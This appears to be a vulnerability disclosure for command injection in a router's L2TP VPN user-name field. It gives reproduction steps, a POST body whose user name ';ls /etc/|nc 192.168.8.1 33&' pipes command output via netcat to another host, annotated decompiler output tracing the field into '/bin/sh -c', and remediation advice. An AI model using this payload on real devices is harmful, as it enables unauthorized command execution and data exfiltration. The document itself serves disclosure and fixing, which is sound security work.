In the router's web interface
Go to the VPN Server List
Add a L2TP Server
Then go to the Server User Manager
Add a new User
The user name field is the injection point: its value is later placed into a shell command.
Send a POST request that changes the user name, for example:
post
http://192.168.1.1/stok=<your token>/ds
body
{"vpn":{"user_1":{"username":";ls /etc/|nc 192.168.8.1 33&","password":"aaaa1111","type":"l2tp","netmode":"client2lan","localip":"192.168.10.11","dns":"223.5.5.5","block":"0","ippool":"d1","maxsessions":"10"}},"method":"set"}
Then click disable in the web interface; this triggers the shell command that is built from the stored user name.
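The code behind this (decompiler output). The first fragment formats request-derived fields into a shell command line with snprintf, without validating or quoting them, and passes the result to systemAsyncExec. The second fragment, from `if ( vfork()` onward, appears to be the body of systemAsyncExec, which runs its argument through `/bin/sh -c`. Shell metacharacters in the user name are therefore interpreted by the shell. The fix is to reject user names outside a strict character set when they are stored, and to pass the values to the helper as separate argv entries instead of through a shell: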
/*
 * Decompiler output from the function that the log strings below name
 * "vpnUserVerify". It builds a shell command line in v20 and hands it to
 * systemAsyncExec.
 *
 * The three %s arguments are copied into the command text as-is, with no
 * quoting, escaping or character filtering visible in this excerpt. Per the
 * steps on this page one of them carries the VPN user name (which of the
 * three is not established by the excerpt), so ';', '|' and '&' in that
 * field become shell syntax instead of data.
 */
snprintf(
v20,
0x200uLL,
". /lib/vpn/user.sh; block_user %s %s %s &",
(const char *)&v19[11] + 2,
v16,
off_99D8A8[v19[65]]);
/* The snprintf return value is discarded, so truncation at 0x200 bytes is not detected here. */
strncpy(v13, "vpnUserVerify", 0x1FuLL);
/* The complete command string, including the user-controlled field, is written to the log. */
logOutput(v13, 0x479u, 0xBu, 1u, "VPN: command: %s\n", v20);
if ( (unsigned int)dbgPrintfMaskCheck(11LL) && (unsigned __int8)dbgPrintfLvlGet() <= 1u )
printf("\t%s(%d). command: %s\n\n", "vpnUserVerify", 1145LL, v20);
/*
 * Sink: the formatted string is executed. The fragment that follows on this
 * page (vfork, then execve of "/bin/sh" with "sh", "-c", a1) is presumably
 * the body of systemAsyncExec, with a1 being this string; confirm against
 * the full disassembly.
 * Remediation: validate the user name against a strict allowlist when it is
 * set, and run the helper with an explicit argv (no "sh -c") so the values
 * are never parsed by a shell.
 */
systemAsyncExec((__int64)v20);
if ( vfork()
|| (v10[0] = (__int64)"sh",
v10[1] = (__int64)"-c",
v10[2] = a1,
v10[3] = 0LL,
!(unsigned int)execve((__int64)"/bin/sh", (__int64)v10, (__int64)&v9)) )
{
v6 = 0;
}
else